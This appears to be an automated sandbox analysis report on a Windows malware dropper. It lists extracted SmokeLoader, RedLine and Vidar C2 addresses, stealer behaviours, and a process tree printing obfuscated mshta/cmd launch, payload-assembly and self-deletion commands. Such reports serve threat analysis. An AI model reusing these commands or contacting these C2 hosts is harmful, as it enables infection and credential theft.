Resubmissions

12-07-2021 16:55

210712-cvz622xsbj 10

10-07-2021 13:25

210710-pdfh7kft96 10

09-07-2021 23:00

210709-hewxkm1xlj 10

09-07-2021 16:08

210709-5ql27kyjqa 10

09-07-2021 14:08

210709-pt977a4bhe 10

08-07-2021 22:09

210708-3ypfnj5j7x 10

08-07-2021 13:30

210708-4hsk7y9f2x 10

08-07-2021 12:14

210708-8t5f9z9egj 10

Analysis

  • max time kernel
    118s
  • max time network
    155s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    08-07-2021 13:30

General

  • Target

    toolspab2 (20).exe

  • Size

    315KB

  • MD5

    585c257e0b345b762e7cdc407d8f9da2

  • SHA1

    ffee403d97b76c3460fc166b9d5ce1205cd216a5

  • SHA256

    4a0ecbcf9b54ed1c9654eb9ee214a797f48c980c6d03a261f62fa9671a2733d6

  • SHA512

    14d39a6cd1c6d912cae7c35e2a98affcd5a9c1df6b947c42de65344e08d34912b09ccac83f9d8c3213b4e3d555769801e8218cb3f4b970d1d08606ee5a454ba8

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

1

C2

45.32.235.238:45555

Extracted

Family

redline

Botnet

agressor

C2

65.21.122.45:8085

Extracted

Family

vidar

Version

39.4

Botnet

824

C2

https://sergeevih43.tumblr.com

Attributes
  • profile_id

    824

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar Stealer 2 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 26 IoCs
  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 14 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 30 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies registry class 2 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\toolspab2 (20).exe
    "C:\Users\Admin\AppData\Local\Temp\toolspab2 (20).exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:672
    • C:\Users\Admin\AppData\Local\Temp\toolspab2 (20).exe
      "C:\Users\Admin\AppData\Local\Temp\toolspab2 (20).exe"
      2⤵
      • Loads dropped DLL
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:1016
  • C:\Users\Admin\AppData\Local\Temp\3038.exe
    C:\Users\Admin\AppData\Local\Temp\3038.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2840
    • C:\Users\Admin\AppData\Local\Temp\3038.exe
      C:\Users\Admin\AppData\Local\Temp\3038.exe
      2⤵
      • Executes dropped EXE
      PID:3868
    • C:\Users\Admin\AppData\Local\Temp\3038.exe
      C:\Users\Admin\AppData\Local\Temp\3038.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:3948
  • C:\Users\Admin\AppData\Local\Temp\3385.exe
    C:\Users\Admin\AppData\Local\Temp\3385.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    PID:2124
  • C:\Users\Admin\AppData\Local\Temp\3665.exe
    C:\Users\Admin\AppData\Local\Temp\3665.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:3144
  • C:\Users\Admin\AppData\Local\Temp\3FBC.exe
    C:\Users\Admin\AppData\Local\Temp\3FBC.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Checks SCSI registry key(s)
    • Suspicious behavior: MapViewOfSection
    PID:3936
  • C:\Users\Admin\AppData\Local\Temp\48B6.exe
    C:\Users\Admin\AppData\Local\Temp\48B6.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4008
  • C:\Users\Admin\AppData\Local\Temp\527B.exe
    C:\Users\Admin\AppData\Local\Temp\527B.exe
    1⤵
    • Executes dropped EXE
    PID:2244
  • C:\Users\Admin\AppData\Local\Temp\5A8B.exe
    C:\Users\Admin\AppData\Local\Temp\5A8B.exe
    1⤵
    • Executes dropped EXE
    PID:3984
  • C:\Windows\SysWOW64\explorer.exe
    C:\Windows\SysWOW64\explorer.exe
    1⤵
      PID:1092
    • C:\Windows\explorer.exe
      C:\Windows\explorer.exe
      1⤵
        PID:816
      • C:\Windows\SysWOW64\explorer.exe
        C:\Windows\SysWOW64\explorer.exe
        1⤵
          PID:3816
        • C:\Windows\explorer.exe
          C:\Windows\explorer.exe
          1⤵
            PID:416
          • C:\Windows\SysWOW64\explorer.exe
            C:\Windows\SysWOW64\explorer.exe
            1⤵
              PID:1336
            • C:\Windows\explorer.exe
              C:\Windows\explorer.exe
              1⤵
                PID:2860
              • C:\Windows\SysWOW64\explorer.exe
                C:\Windows\SysWOW64\explorer.exe
                1⤵
                  PID:1256
                • C:\Windows\explorer.exe
                  C:\Windows\explorer.exe
                  1⤵
                    PID:500
                  • C:\Windows\SysWOW64\explorer.exe
                    C:\Windows\SysWOW64\explorer.exe
                    1⤵
                      PID:2820
                    • C:\Users\Admin\AppData\Local\Temp\B742.exe
                      C:\Users\Admin\AppData\Local\Temp\B742.exe
                      1⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:2752
                      • C:\Users\Admin\AppData\Local\Temp\B742.exe
                        C:\Users\Admin\AppData\Local\Temp\B742.exe
                        2⤵
                        • Executes dropped EXE
                        • Adds Run key to start application
                        • Modifies system certificate store
                        PID:1636
                        • C:\Windows\SysWOW64\icacls.exe
                          icacls "C:\Users\Admin\AppData\Local\8ee7440e-26f6-4fd7-800a-64fea4f46e22" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                          3⤵
                          • Modifies file permissions
                          PID:184
                        • C:\Users\Admin\AppData\Local\Temp\B742.exe
                          "C:\Users\Admin\AppData\Local\Temp\B742.exe" --Admin IsNotAutoStart IsNotTask
                          3⤵
                            PID:5072
                            • C:\Users\Admin\AppData\Local\Temp\B742.exe
                              "C:\Users\Admin\AppData\Local\Temp\B742.exe" --Admin IsNotAutoStart IsNotTask
                              4⤵
                                PID:5096
                                • C:\Users\Admin\AppData\Local\cfd9e064-5c1e-450e-a037-dd75e310196d\build2.exe
                                  "C:\Users\Admin\AppData\Local\cfd9e064-5c1e-450e-a037-dd75e310196d\build2.exe"
                                  5⤵
                                    PID:4708
                                    • C:\Users\Admin\AppData\Local\cfd9e064-5c1e-450e-a037-dd75e310196d\build2.exe
                                      "C:\Users\Admin\AppData\Local\cfd9e064-5c1e-450e-a037-dd75e310196d\build2.exe"
                                      6⤵
                                        PID:5312
                            • C:\Users\Admin\AppData\Local\Temp\B7FE.exe
                              C:\Users\Admin\AppData\Local\Temp\B7FE.exe
                              1⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Checks processor information in registry
                              PID:3056
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c taskkill /im B7FE.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\B7FE.exe" & del C:\ProgramData\*.dll & exit
                                2⤵
                                  PID:2584
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /im B7FE.exe /f
                                    3⤵
                                    • Kills process with taskkill
                                    PID:4232
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /t 6
                                    3⤵
                                    • Delays execution with timeout.exe
                                    PID:4440
                              • C:\Users\Admin\AppData\Local\Temp\BB8A.exe
                                C:\Users\Admin\AppData\Local\Temp\BB8A.exe
                                1⤵
                                • Executes dropped EXE
                                PID:3140
                                • C:\Windows\SysWOW64\mshta.exe
                                  "C:\Windows\System32\mshta.exe" VBscRIPT:ClOSe (creAtEobJEct ( "WSCRIPt.ShElL" ). Run( "C:\Windows\system32\cmd.exe /Q /C TyPE ""C:\Users\Admin\AppData\Local\Temp\BB8A.exe"" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if """" == """" for %w in ( ""C:\Users\Admin\AppData\Local\Temp\BB8A.exe"" ) do taskkill -F -im ""%~Nxw"" " , 0 , tRUe ) )
                                  2⤵
                                    PID:3200
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\system32\cmd.exe" /Q /C TyPE "C:\Users\Admin\AppData\Local\Temp\BB8A.exe" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if "" == "" for %w in ( "C:\Users\Admin\AppData\Local\Temp\BB8A.exe" ) do taskkill -F -im "%~Nxw"
                                      3⤵
                                        PID:3868
                                        • C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe
                                          ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT
                                          4⤵
                                          • Executes dropped EXE
                                          PID:1764
                                          • C:\Windows\SysWOW64\mshta.exe
                                            "C:\Windows\System32\mshta.exe" VBscRIPT:ClOSe (creAtEobJEct ( "WSCRIPt.ShElL" ). Run( "C:\Windows\system32\cmd.exe /Q /C TyPE ""C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe"" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if ""-pLTfn82smRxoqI1Rgg5LiENy6ewubmT "" == """" for %w in ( ""C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe"" ) do taskkill -F -im ""%~Nxw"" " , 0 , tRUe ) )
                                            5⤵
                                              PID:3704
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\system32\cmd.exe" /Q /C TyPE "C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if "-pLTfn82smRxoqI1Rgg5LiENy6ewubmT " == "" for %w in ( "C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe" ) do taskkill -F -im "%~Nxw"
                                                6⤵
                                                  PID:1720
                                              • C:\Windows\SysWOW64\mshta.exe
                                                "C:\Windows\System32\mshta.exe" VbsCripT:cLose ( cReatEoBJEcT ( "WScript.sheLl" ). Run ( "CMd.EXe /C EChO YE%TIMe%i> q1Qo.EY & echo | seT /P = ""MZ"" > FIq2DqT_.Q &copy /b /y FIq2DQT_.Q + QBEZ3.8 + R5FQa3.v3P + WWAA.Ue5 + JBVF~.yS + rcEI.~+ Mj12.DS + q1QO.Ey ..\mRZCIH.DO & Del /q *& STart regsvr32.exe -S ..\MRZCIH.DO /U " , 0 , true ) )
                                                5⤵
                                                  PID:3512
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /C EChO YE%TIMe%i> q1Qo.EY & echo | seT /P = "MZ" > FIq2DqT_.Q &copy /b /y FIq2DQT_.Q + QBEZ3.8 + R5FQa3.v3P +WWAA.Ue5 + JBVF~.yS + rcEI.~+Mj12.DS + q1QO.Ey ..\mRZCIH.DO & Del /q *& STart regsvr32.exe -S ..\MRZCIH.DO /U
                                                    6⤵
                                                      PID:2584
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /S /D /c" echo "
                                                        7⤵
                                                          PID:3864
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>FIq2DqT_.Q"
                                                          7⤵
                                                            PID:1340
                                                          • C:\Windows\SysWOW64\regsvr32.exe
                                                            regsvr32.exe -S ..\MRZCIH.DO /U
                                                            7⤵
                                                            • Loads dropped DLL
                                                            • Suspicious use of NtCreateThreadExHideFromDebugger
                                                            PID:2064
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill -F -im "BB8A.exe"
                                                      4⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3504
                                              • C:\Users\Admin\AppData\Local\Temp\C83D.exe
                                                C:\Users\Admin\AppData\Local\Temp\C83D.exe
                                                1⤵
                                                • Executes dropped EXE
                                                • Checks whether UAC is enabled
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1240
                                              • C:\Users\Admin\AppData\Local\Temp\CD4F.exe
                                                C:\Users\Admin\AppData\Local\Temp\CD4F.exe
                                                1⤵
                                                • Executes dropped EXE
                                                PID:3984
                                                • C:\Users\Admin\AppData\Local\Temp\is-UV01O.tmp\CD4F.tmp
                                                  "C:\Users\Admin\AppData\Local\Temp\is-UV01O.tmp\CD4F.tmp" /SL5="$2013A,188175,104448,C:\Users\Admin\AppData\Local\Temp\CD4F.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  PID:3976
                                                  • C:\Users\Admin\AppData\Local\Temp\is-0SHAC.tmp\134 Vaporeondè_éçè_)))_.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\is-0SHAC.tmp\134 Vaporeondè_éçè_)))_.exe" /S /UID=rec7
                                                    3⤵
                                                    • Executes dropped EXE
                                                    PID:3832
                                                    • C:\Program Files\Uninstall Information\MHUYTWFGVU\irecord.exe
                                                      "C:\Program Files\Uninstall Information\MHUYTWFGVU\irecord.exe" /VERYSILENT
                                                      4⤵
                                                      • Executes dropped EXE
                                                      PID:4632
                                                      • C:\Users\Admin\AppData\Local\Temp\is-O5DB4.tmp\irecord.tmp
                                                        "C:\Users\Admin\AppData\Local\Temp\is-O5DB4.tmp\irecord.tmp" /SL5="$201FE,5808768,66560,C:\Program Files\Uninstall Information\MHUYTWFGVU\irecord.exe" /VERYSILENT
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Drops file in Program Files directory
                                                        • Suspicious use of FindShellTrayWindow
                                                        PID:4680
                                                        • C:\Program Files (x86)\i-record\I-Record.exe
                                                          "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          PID:4904
                                                    • C:\Users\Admin\AppData\Local\Temp\2a-09862-2a2-5e2bf-4124bb9fbfe5a\Caepyqewaxi.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\2a-09862-2a2-5e2bf-4124bb9fbfe5a\Caepyqewaxi.exe"
                                                      4⤵
                                                      • Executes dropped EXE
                                                      PID:4700
                                                    • C:\Users\Admin\AppData\Local\Temp\0e-cf6f6-096-7d8bb-3446ac0342adb\Kybewashico.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\0e-cf6f6-096-7d8bb-3446ac0342adb\Kybewashico.exe"
                                                      4⤵
                                                      • Executes dropped EXE
                                                      PID:4764
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\egtbagkz.tvk\GcleanerEU.exe /eufive & exit
                                                        5⤵
                                                          PID:3512
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1hy4ug3v.omm\installer.exe /qn CAMPAIGN="654" & exit
                                                          5⤵
                                                            PID:5012
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bi3y4lia.wzp\Setup3310.exe /Verysilent /subid=623 & exit
                                                            5⤵
                                                              PID:4596
                                                              • C:\Users\Admin\AppData\Local\Temp\bi3y4lia.wzp\Setup3310.exe
                                                                C:\Users\Admin\AppData\Local\Temp\bi3y4lia.wzp\Setup3310.exe /Verysilent /subid=623
                                                                6⤵
                                                                  PID:4860
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-BNH27.tmp\Setup3310.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-BNH27.tmp\Setup3310.tmp" /SL5="$102CA,138429,56832,C:\Users\Admin\AppData\Local\Temp\bi3y4lia.wzp\Setup3310.exe" /Verysilent /subid=623
                                                                    7⤵
                                                                      PID:4212
                                                                      • C:\Users\Admin\AppData\Local\Temp\is-7IB18.tmp\Setup.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\is-7IB18.tmp\Setup.exe" /Verysilent
                                                                        8⤵
                                                                          PID:3980
                                                                          • C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe
                                                                            "C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe"
                                                                            9⤵
                                                                              PID:5684
                                                                              • C:\Users\Admin\AppData\Roaming\8942219.exe
                                                                                "C:\Users\Admin\AppData\Roaming\8942219.exe"
                                                                                10⤵
                                                                                  PID:5160
                                                                                • C:\Users\Admin\AppData\Roaming\1500708.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\1500708.exe"
                                                                                  10⤵
                                                                                    PID:1728
                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                      11⤵
                                                                                        PID:5492
                                                                                    • C:\Users\Admin\AppData\Roaming\7494104.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\7494104.exe"
                                                                                      10⤵
                                                                                        PID:5412
                                                                                    • C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe
                                                                                      "C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe"
                                                                                      9⤵
                                                                                        PID:5704
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-FVJ4T.tmp\MediaBurner.tmp
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-FVJ4T.tmp\MediaBurner.tmp" /SL5="$303AC,303887,220160,C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe"
                                                                                          10⤵
                                                                                            PID:5856
                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-MA1EN.tmp\_____________bob.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-MA1EN.tmp\_____________bob.exe" /S /UID=burnerch1
                                                                                              11⤵
                                                                                                PID:1724
                                                                                          • C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe
                                                                                            "C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe"
                                                                                            9⤵
                                                                                              PID:5676
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit
                                                                                                10⤵
                                                                                                  PID:6244
                                                                                              • C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe
                                                                                                "C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe"
                                                                                                9⤵
                                                                                                  PID:5668
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    10⤵
                                                                                                      PID:5468
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                      10⤵
                                                                                                        PID:2544
                                                                                                    • C:\Program Files (x86)\Data Finder\Versium Research\updatetes.exe
                                                                                                      "C:\Program Files (x86)\Data Finder\Versium Research\updatetes.exe"
                                                                                                      9⤵
                                                                                                        PID:5756
                                                                                                      • C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe
                                                                                                        "C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe"
                                                                                                        9⤵
                                                                                                          PID:5748
                                                                                                          • C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe
                                                                                                            "C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe" -a
                                                                                                            10⤵
                                                                                                              PID:5452
                                                                                                          • C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe
                                                                                                            "C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"
                                                                                                            9⤵
                                                                                                              PID:5740
                                                                                                            • C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe
                                                                                                              "C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"
                                                                                                              9⤵
                                                                                                                PID:5732
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fyi424z3.hm4\google-game.exe & exit
                                                                                                        5⤵
                                                                                                          PID:4516
                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            6⤵
                                                                                                              PID:4512
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\fyi424z3.hm4\google-game.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\fyi424z3.hm4\google-game.exe
                                                                                                              6⤵
                                                                                                                PID:3316
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\fyi424z3.hm4\google-game.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\fyi424z3.hm4\google-game.exe" -a
                                                                                                                  7⤵
                                                                                                                    PID:4000
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2luibd3v.qbj\GcleanerWW.exe /mixone & exit
                                                                                                                5⤵
                                                                                                                  PID:1724
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hlguk33n.ydw\toolspab1.exe & exit
                                                                                                                  5⤵
                                                                                                                    PID:4648
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\hlguk33n.ydw\toolspab1.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\hlguk33n.ydw\toolspab1.exe
                                                                                                                      6⤵
                                                                                                                        PID:5492
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\hlguk33n.ydw\toolspab1.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\hlguk33n.ydw\toolspab1.exe
                                                                                                                          7⤵
                                                                                                                            PID:5424
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aapju1x4.wea\SunLabsPlayer.exe /S & exit
                                                                                                                        5⤵
                                                                                                                          PID:3704
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\aapju1x4.wea\SunLabsPlayer.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\aapju1x4.wea\SunLabsPlayer.exe /S
                                                                                                                            6⤵
                                                                                                                              PID:2988
                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa8328.tmp\tempfile.ps1"
                                                                                                                                7⤵
                                                                                                                                  PID:5896
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\E089.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\E089.exe
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:2824
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\EC42.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\EC42.exe
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:1220
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                        2⤵
                                                                                                                          PID:4512
                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                            taskkill /f /im chrome.exe
                                                                                                                            3⤵
                                                                                                                            • Kills process with taskkill
                                                                                                                            PID:4816
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\F76F.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\F76F.exe
                                                                                                                        1⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:4152
                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                        1⤵
                                                                                                                          PID:4992
                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                          1⤵
                                                                                                                            PID:4900
                                                                                                                          • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                            1⤵
                                                                                                                            • Process spawned unexpected child process
                                                                                                                            PID:2228
                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                              2⤵
                                                                                                                                PID:8
                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                              1⤵
                                                                                                                                PID:4984
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-E7R4F.tmp\LabPicV3.tmp
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-E7R4F.tmp\LabPicV3.tmp" /SL5="$203D6,506127,422400,C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"
                                                                                                                                1⤵
                                                                                                                                  PID:5848
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-GFDTA.tmp\12(((((.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-GFDTA.tmp\12(((((.exe" /S /UID=lab214
                                                                                                                                    2⤵
                                                                                                                                      PID:5664
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-V5R8N.tmp\lylal220.tmp
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-V5R8N.tmp\lylal220.tmp" /SL5="$303D4,172303,88576,C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"
                                                                                                                                    1⤵
                                                                                                                                      PID:5840
